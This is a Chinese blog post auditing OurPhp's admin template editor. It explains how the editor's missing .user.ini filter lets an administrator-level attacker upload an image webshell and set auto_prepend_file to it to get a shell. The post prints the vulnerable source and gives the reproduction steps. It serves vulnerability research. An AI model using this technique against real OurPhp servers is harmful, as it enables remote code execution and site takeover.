php代码审计-OurPhp 后台任意文件上传getshell

已于 2022-10-27 23:39:34 修改
阅读量456 收藏 1
点赞数
分类专栏: 代码审计 文章标签: php 前端 服务器
于 2022-10-27 21:52:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44747030/article/details/127561282
版权

OurPhp 后台任意文件上传getshell

思路

漏洞存在 ourphp_filebox.php 文件由于未过滤上传.user.ini文件我们可以自定义一个.user.ini文件,再上传一个图片马getshell。

ourphp_filebox.php文件 从206行开始看

<?php

include '../../config/ourphp_code.php';
include '../../config/ourphp_config.php';
include '../../function/ourphp_function.class.php';

function listDirFiles($dir)
{
    $arr = array();
    if (is_dir($dir)) {//如果是目录,则进行下一步操作
        $d = opendir($dir);//打开目录
        if ($d) {//目录打开正常
            while (($file = readdir($d)) !== false) {//循环读出目录下的文件,直到读不到为止
                if  ($file != '.' && $file != '..') {//排除一个点和两个点
                    if (is_dir($file)) {//如果当前是目录
                        $arr[$file] = listDirFiles($file);//进一步获取该目录里的文件
                    } else {
                        $arr[] = $file;//记录文件名
                    }
                }
            }
        }
        closedir($d);//关闭句柄
    }
    return $arr;
}

function format($ourphp)
{
    $format = 'ico_txt.png';
    $formatfont = '不可编辑文件';
    if(strstr($ourphp,".html"))
    {
        $format = 'ico_html.png';
        $formatfont = 'html文件可编辑';
    }
    if(strstr($ourphp,".php"))
    {
        $format = 'ico_php.png';
        $formatfont = 'php文件可编辑';
    }
    if(strstr($ourphp,".css"))
    {
        $format = 'ico_css.png';
        $formatfont = 'css文件可编辑';
    }
    if(strstr($ourphp,".js"))
    {
        $format = 'ico_js.png';
        $formatfont = 'js文件可编辑';
    }

    return array($format,$formatfont);
}

function pw($a,$b)
{
    global $db,$ourphp;
    session_start();
    if ($a == $ourphp['validation'] && $b == $ourphp['safecode']){
         
        $_SESSION['ourphp_out'] = "ourphp";
        
    }else{

        if(empty($_SESSION['ourphp_out']))
        {
            include 'ourphp_checkadmin.php';

        }else{

            session_start();

        }

    }
}

function filearray($ourphp)
{
    $a = array(
        'wap' => '移动端模板',
        'default' => '默认模板',
        'user' => '会员模板',
        'images' => '图片目录',
        'js' => 'JS文件目录',
        'css' => '样式文件目录',
    );

    if(isset($a[$ourphp]))
    {
        return $a[$ourphp];
    }else{

        if(strstr($ourphp,".html") || strstr($ourphp,".css") || strstr($ourphp,".js") || strstr($ourphp,".php") || strstr($ourphp,".jpg") || strstr($ourphp,".jpeg") || strstr($ourphp,".png") || strstr($ourphp,".gif"))
        {
            $format = format($ourphp);
            return $format[1];
        }else{
            return "模板目录";
        }
    }
    
}

$v = (empty($_GET['validation']))? "0" : $_GET['validation'];
$c = (empty($_GET['code']))? "0" : $_GET['code'];
pw($v,$c);
if(isset($_GET['out'])){
    unset($_SESSION['ourphp_out']);
}

$list = '';
if(!isset($_GET['path']))
{

    if(empty($_SESSION['ourphp_out']))
    {
        $file = listDirFiles('../../templates'); 
    }else{
        $file = listDirFiles('../../'); 
    }
    
    foreach ($file as $op) {
        if(!strstr($op,".")){
        $list .= '
        <li>
                <a href="?path='.$op.'&dir"><img src="../../skin/ico_file.png" width="80"><p>'.$op.'<br /><span>'.filearray($op).'</span></p></a>
        </li>
        ';
        }
    }

}else{

    if(empty($_SESSION['ourphp_out']))
    {
        $file = listDirFiles('../../templates/'.$_GET['path']);
        $file2 = '../../templates/'.$_GET['path'];
    }else{
        $file = listDirFiles('../../'.$_GET['path']);
        $file2 = '../../'.$_GET['path'];  
    }


    if(isset($_GET['dir']))
    {
        foreach ($file as $op) {
            if(!strstr($op,".")){
                $list .= '
                <li>
                        <a href="?path='.$_GET['path'].'/'.$op.'&dir"><img src="../../skin/ico_file.png" width="80"><p>'.$op.'<br /><span>'.filearray($op).'</span></p></a>
                </li>
                ';
            }
            if(strstr($op,".html") || strstr($op,".css") || strstr($op,".js") || strstr($op,".php") || strstr($op,".htaccess")){

                $format = format($op);
                $list .= '
                <li>
                        <a href="?path='.$file2.'/'.$op.'&edit"><img src="../../skin/'.$format[0].'" width="80"><p>'.$op.'<br /><span>'.filearray($op).'</span></p></a>
                </li>
                ';
            }
            if(strstr($op,".jpg") || strstr($op,".jpeg") || strstr($op,".png") || strstr($op,".gif")){
                $list .= '
                <li>
                        <a href="'.$file2.'/'.$op.'" target="_blank"><img src="'.$file2.'/'.$op.'" width="80" height="70"><p>'.$op.'<br /><span>'.filearray($op).'</span></p></a>
                </li>
                ';
            }
        }
    }

    if(isset($_GET['edit']))
    {
        if(isset($_GET['path'])){
            $openfile = file_get_contents($_GET['path']);
            $openfile = str_replace("<textarea", "<ourphp_", $openfile);
            $openfile = str_replace("</textarea>", "</ourphp_>", $openfile);
            $list = '
            <form id="form1" name="form1" method="post" action="?path=edit&ok">
                <div class="boxedit">
                        <textarea id="code" name="code">'.$openfile.'</textarea>
                </div>
                <div class="boxok">

                    <p><a href="#"" onClick=window.open("tags.php","go","scrollbars=0,resizable=0,scrollbars=yes,width=1300,height=500,left=150,top=150,screenX=50,screenY=50")>在新窗口中弹出模板标签</a></p>
                    <p><a href="#"" onClick=window.open("ourphp_column.php?id=ourphp","go","scrollbars=0,resizable=0,scrollbars=yes,width=1300,height=500,left=150,top=150,screenX=50,screenY=50")>在新窗口中弹出栏目管理</a></p>
                    <p class="mt-50">
                    <input type="submit" name="Submit" value="保存代码" class="an" />
                    </p>
                </div>
                <input type="hidden" value="'.$_GET['path'].'|'.MD5($_GET['path'].$ourphp['safecode']).'" name="md">
            </form>
                <script id="script">
                var editor = CodeMirror.fromTextArea(document.getElementById("code"), {
                    lineNumbers: true,
                    ineWrapping: true,
                    mode: "markdown"
                });
                </script>
            ';
        }
    }
        //如果存在Ok参数就进入到这个循环中
    if(isset($_GET['ok']))
    {
        //如果通过post传参 code和md参数其中一个为空都弹出不能为空呀
        if(empty($_POST['code']) || empty($_POST['md'])){
           $list = '<h1 style="float:left; margin-top:30px; padding-bottom:30px; font-size:20px; width:100%; text-align:center;">不能为空呀!</h1>';
        }
        //explode() 函数把字符串打散为数组。
        //把post传进来的md参数 以|打散为一个个的数组
        //前端传过来的../../templates/wap/cn/cn_about.html|afe53c30ae3ae72012ba358674198340
        //$md[0]= ../../templates/wap/cn/cn_about.html
        $md = explode("|", $_POST['md']);
        //md5() 函数计算字符串的 MD5 散列。
        //获取到md[0]下表的元素拼接上ourphp变量中safecode的值
        //在ourphp_config.php中ourphp数组中'safecode' => 'JnlZJ72Ij7dVMgr5KxV1dHTTPkWx2HYU2Ij7dV'
        //$md2 == afe53c30ae3ae72012ba358674198340
        $md2 = MD5($md[0].$ourphp['safecode']);
        //$md[1] = afe53c30ae3ae72012ba358674198340
        if($md[1] != $md2){
            $list = '<h1 style="float:left; margin-top:30px; padding-bottom:30px; font-size:20px; width:100%; text-align:center;">验证不通过呀!</h1>';
        }
        // 接受post请求 参数code
        $code = $_POST['code'];
        //str_replace()函数把$code值中的<ourphp_替换成<textarea
        $code = str_replace("<ourphp_", "<textarea", $code);
        $code = str_replace("</ourphp_>", "</textarea>", $code);
        // $_SESSION 存储 Session 变量
        // session变量中ourphp_out为空就进入下面的if
        //这里判断的$_SESSION['ourphp_out' 是否为空,$_SESSION['ourphp_out变量的赋值是在大概60行if ($a == $ourphp['validation'] && $b == $ourphp['safecode']){
        //如果有validation和safecode安全校验码则$_SESSION['ourphp_out']不为空
        if(empty($_SESSION['ourphp_out']))
        {
            
            //strstr函数搜索字符串在另一字符串中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE。
            //有就弹出警告
            //判断$code 中是否有<?php,<%这种类似的一句话木马 md[0]中是不是有.asp,.aspx....等等后缀,这里就是漏洞产生的地方,没有过滤掉.user.ini文件
            //我们可以上次.user.ini文件就可以成功的getshell
            if(strstr($code,"<?php") || strstr($code,"<%") || strstr($code,"language=\"php\"") || strstr($code,"language='php'") || strstr($code,"language=php") || strstr($code,"<?=") || strstr($md[0],".php") || strstr($md[0],".asp") || strstr($md[0],".aspx") || strstr($md[0],".jsp") || strstr($md[0],".htaccess"))
            {
                $list = '<h1 style="float:left; margin-top:30px; padding-bottom:30px; font-size:20px; width:100%; text-align:center;">不要提交违法代码!</h1>';
            }else{
                //没有就写入md[0]到$filego变量  md[0]=../../templates/wap/cn/cn_about.html
                //fopen() 函数打开一个文件或 URL
                //"w" (写入方式打开,清除文件内容,如果文件不存在则尝试创建之)
                $filego = fopen($md[0],'w');
                //fwrite() 函数将内容写入一个打开的文件中。
                //将$code 写入到$filego 也就是刚刚fopen($md[0],'w');中
                fwrite($filego,$code);
                fclose($filego);

                $list = '<h1 style="float:left; margin-top:30px; padding-bottom:30px; font-size:20px; width:100%; text-align:center;">编辑成功!</h1>';

            }
            //如果不为空就判断md[0]中是不是有.asp,.aspx....等等后缀,这里就是漏洞产生的地方,没有过滤掉.user.ini文件
            //我们可以上次.user.ini文件就可以成功的getshell
        }else{
            

            if(strstr($md[0],".asp") || strstr($md[0],".aspx") || strstr($md[0],".jsp") || strstr($md[0],".htaccess"))
            {
                $list = '<h1 style="float:left; margin-top:30px; padding-bottom:30px; font-size:20px; width:100%; text-align:center;">不要提交违法代码!</h1>';
            }else{

                $filego = fopen($md[0],'w');
                fwrite($filego,$code);
                fclose($filego);

                $list = '<h1 style="float:left; margin-top:30px; padding-bottom:30px; font-size:20px; width:100%; text-align:center;">编辑成功!</h1>';

            }

        }

    }

}


?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>OurPHP Filebox 1.0.0</title>
<link href="templates/images/ourphp_login.css?<?php echo rand(11111,99999);?>" rel="stylesheet" type="text/css"> 
<script type="text/javascript" src="../../function/plugs/jquery/1.7.2/jquery-1.7.2.min.js"></script>
<link rel='stylesheet' href='../../function/plugs/codemirror/codemirror.css'>
<script src='../../function/plugs/codemirror/codemirror.js'></script>
<script src='../../function/plugs/codemirror/markdown.js'></script>
<script src='../../function/plugs/codemirror/xml.js'></script>
<style type='text/css'>
.CodeMirror{border:1px solid silver;border-width:1px 2px}
.cm-header{font-family:arial}
.cm-header-1{font-size:150%}
.cm-header-2{font-size:130%}
.cm-header-3{font-size:120%}
.cm-header-4{font-size:110%}
.cm-header-5{font-size:100%}
.cm-header-6{font-size:90%}
.cm-strong{font-size:140%}
</style>
</head>
<body>
<div id="tabs0" class="mt-50">
    <ul class="menu0" id="menu0">
        <li class="hover">在线模板编辑</li>
        <li><a href="javascript:window.history.go(-1);">返回上一层</a></li>
    </ul>
    <div class="main" id="main0" style="border-top:2px #488fcd solid; clear:both;">
        <ul class="block filelist">
            <?php
            echo $list;
            ?>
        </ul>
    </div>
</div>
</body>
</html>

复现

首先我们在全局->在线模板登陆处抓包

在这里插入图片描述

在这里插入图片描述

可以看到数据包中有code和md变量,结合上面抓包的内容,会发现code的内容就是模板功能的代码部分,md就是路径。

       if(empty($_POST['code']) || empty($_POST['md'])){
           $list = '<h1 style="float:left; margin-top:30px; padding-bottom:30px; font-size:20px; width:100%; text-align:center;">不能为空呀!</h1>';
        }co
        $md = explode("|", $_POST['md']);
        $md2 = MD5($md[0].$ourphp['safecode']);
        if($md[1] != $md2){
            $list = '<h1 style="float:left; margin-top:30px; padding-bottom:30px; font-size:20px; width:100%; text-align:center;">验证不通过呀!</h1>';
        }

        $code = $_POST['code'];
        $code = str_replace("<ourphp_", "<textarea", $code);
        $code = str_replace("</ourphp_>", "</textarea>", $code);

在这里插入图片描述

内容->图集管理处上传图片马,并记录下路径

{"error":0,"url":"\/function\/uploadfile\/20221025\/20221025205817_80197.jpg"}

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

上传**.user.ini**文件并设置,执行文件就包含刚刚的图片马

auto_prepend_file=/function/uploadfile/20221025/20221025205817_80197.jpg

在这里插入图片描述

成功上传

在这里插入图片描述

我们只需要随便执行**.user.ini同路径下Php文件**,该php文件都会去包含我们指定的图片马。

在这里插入图片描述

evilxpl
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
rdp反向攻击利用总结
weixin_44747030的博客
11-19 754
rdp反向攻击
生命在于学习——网站Getshell的方法
易水哲的博客
09-08 3606
网站Getshell的方法
22-任意文件上传-(一)
最新发布
XLbb的博客
05-10 799
一、概述 任意文件上传(Arbitrary File Upload)是一种网络安全漏洞,漏洞源于应用程序对用户上传文件的不当处理。当系统未能正确验证文件类型、内容或路径时,攻击者便有机可乘,上传携带恶意代码的文件,如Webshell,进而执行任意命令、窃取数据或发起进一步攻击。 二、使用pikachu靶场环境学习测试 1、客户端前端校验(client check): 三、upload-labs靶场环境测试学习
任意文件上传
来日可期的博客
08-29 2234
任意文件上传漏洞(Arbitrary File Upload Vulnerability)是指攻击者通过某种方式绕过服务器端对上传文件类型和路径的合法性检查,成功地上传恶意文件到目标服务器上,并执行其中的恶意代码。这种漏洞广泛存在于许多Web应用程序中,特别是那些允许用户上传文件的网站或Web应用。
PHP代码审计』OURPHP3.2.0.0222存在SQL注入漏洞①
Ho1aAs‘s Blog
06-10 310
文章目录前言一、漏洞演示二、漏洞分析三、利用四、修复五、总结完 前言 作者:Ho1aAs 博客:https://blog.csdn.net/xxy605 一、漏洞演示 访问后台的编辑文章/client/manage/ourphp_adview.php?ourphp_cms=edit&id=1 POST /client/manage/ourphp_adview.php?ourphp_cms=edit&id=1 HTTP/1.1 Host: 192.168.1.101 Content-Len
OurPHP3.3.1审计与测试
feng的博客
06-11 836
OurPHP3.3.1审计与测试 目录遍历漏洞 还是先看一下后台关于模板的代码,首先发现对于传入的路径没有做waf,导致了目录遍历。 漏洞从client/manage/ourphp_filebox.php`的第134行开始: }else{ if(empty($_SESSION['ourphp_out'])) { $file = listDirFiles('../../templates/'.$_GET['path']); $file2 = '../../te
第52天:代码审计-PHP项目类RCE及文件包含下载删除1
08-03
在网络安全领域,代码审计是确保应用程序安全性的重要环节。本文主要探讨了PHP项目中常见的安全漏洞类型,包括远程代码执行(RCE)、文件包含、下载、删除等,并提供了相关的漏洞利用关键字和实例分析。 首先,SQL...
php代码审计-代码执行.pdf
12-14
PHP 代码执行与审计 PHP 代码执行是 PHP 语言中的一种机制,允许开发者在 PHP 代码中执行动态生成的代码。这种机制可以带来很高的灵活性和效率,但同时也存在很大的安全风险。如果攻击者可以控制用于执行的代码串,...
通达OA任意文件上传_文件包含GetShell1
08-03
- 一旦攻击者成功上传了恶意文件,他们可以通过文件包含漏洞来执行这些文件中的代码,从而实现远程代码执行(RCE)。文件包含漏洞通常发生在程序尝试动态地加载或执行存储在服务器上的文件时,如果没有正确验证文件...
Seacms代码审计小结(后台多处getshell)1
08-03
在框架中,有很多是写的是以 txt 结尾的件,这种直接读是法以 php 来解析,但是如果找到处件包含的漏洞,让他包含的是这种我们可以修改的件,那就也可以造成代码
代码审计之youdiancms最新版getshell漏洞1
08-03
代码审计之youdiancms最新版getshell漏洞 本文将对youdiancms最新版getshell漏洞进行代码审计,详细讲解漏洞的发现和利用过程。 SQL注入漏洞 第一步,我们拿到源码,发现该系统是基于THINKPHP3开发的。在App/Lib/...
FileBox PHP在线文件管理程序 v1.9.0.1.rar
07-10
FileBox PHP在线文件管理程序,诸如实现在线查看文件列表,批量修改文件名、批量删除、显示文件大小等功能。   帮助站长一键备份自己的网站和数据库、一键搬家,或者当空间服务商没有提供文件解压程序的时候拿它当作文件解压程序使用。 设置说明:   $sitetitle - 标题名称   $filefolder - 程序目录   $user - 用户名   $pass - 密码   $safe_num - 设置多少次后禁止登陆,为0则不限制,建议为3-5   $mail - 若有恶意登录,会发邮件到这个邮箱,前提是mail()函数可用!      默认用户名为filebox 密码为filebox   1.9.0.1 更新:   NEW:现在可以排序文件了
GetShell的姿势
2301_76786857的博客
01-19 1186
渗透测试工作的一个阶段性目标就是获取目标服务器的操作控制权限,于是WebShell便应运而生。Webshell中的WEB就是web服务,shell就是管理攻击者与操作系统之间的交互。Webshell被称为攻击者通过Web服务器端口对Web服务器有一定的操作权限,而webshell常以网页脚本的形式出现。常见的WebShell使用asp、jsp和php来编写,提供了如执行系统命令、文件上传下载、数据库管理等功能。
如何绕过检测上传php文件,shell上传绕过检测方法
weixin_36026440的博客
03-11 684
文件上传漏洞是所有漏洞中最为直接,有效的获取服务器权限的方法。但是想要利用好他并不容易,因为他的上传姿势实在是太过花哨(多)。所以这里介绍一些简单的上传姿势。望大牛误喷shell上传条件:1、上传2、绝对路径3、要有权限文件上传检验姿势1、客户端javascript校验(一般只校验后缀名)2、服务端校验①文件头content-type字段校验(image/gif)②文件内容头校验(GIF89a)...
phpinfo包含临时文件Getshell全过程及源码
记录学习,一起进步
03-04 2701
phpinfo包含临时文件Getshell全过程及源码
[代码审计]OurPHP后台任意文件删除漏洞分析
Y4tacker的博客
04-17 617
文章目录前言分析 前言 前几天爆出OURPHP有个后台任意文件删除漏洞,考虑到危害性不太大的情况下对此进行分析 分析 我们来删除这个我自己创建的文件夹 漏洞在client/manage/ourphp_bakgo.php中,首先这里有个eval会执行这俩函数,但是前面那个有exit所以我们得绕过它,随便GET请求传入一个值即可 我们删除文件需要到第520行,来看看需要哪些参数 首先是最外层的嵌套,$_POST[back_type]=="partsave"和$_POST['action']=="datab
文件上传漏洞:getshell的最好方式,我们如何防御?
李熠专用博客_白帽子一枚,人称低危终结者
09-09 2923
我相信,你在开发Web应用时,后端一定会提供文件的上传功能,比如前端页面肯定有图片的展示,后端必定会提供图片的上传入口。但是,你在做文件上传功能时,是否考虑过它的安全性问题呢? 请看下面的代码: @PostMapping("upload") public String upload(@RequestParam("file")MultipartFile file,HttpServletRequest request)throws Exception{ String filename = fil.
文件上传漏洞获取服务器,任意文件上传漏洞 getshell 教程
weixin_42366319的博客
08-06 1192
getshell这里通常是指获取webshell权限等这些。什么是webshell?webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。一、什么是 getshell?1、什么是shellshell就是一个脚本文件,我们通过这个脚本文件来管理或者控制服务器的文件、数据库等信息。2、如何getshell?目的是将脚本文件上传到服务...
【漏洞学习——任意文件上传】四川外国语大学某分站任意文件上传导致getshell
Fly_鹏程万里
02-22 640
漏洞细节 fck编辑器存在地址:http://**.**.**.**:8080/include/fckeditor/editor/filemanager/upload/test.html 上传文件时可在文件名后加空格进行绕过上传 getshell 修复建议:增加白名单检测绕过 参见:https://bugs.shuimugan.com/bug/view?bug_no=15406...
emlog CMS的代码审计_越权到后台getshell - 先知社区1
08-03
文章主要介绍了emlog CMS的代码审计过程中发现的一个越权访问后台并获取shell的漏洞。作者首先通过分析安装文件install.php发现了一系列漏洞,包括无验证功能、任意重装覆盖、表单不做过滤等问题,导致了config.php...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值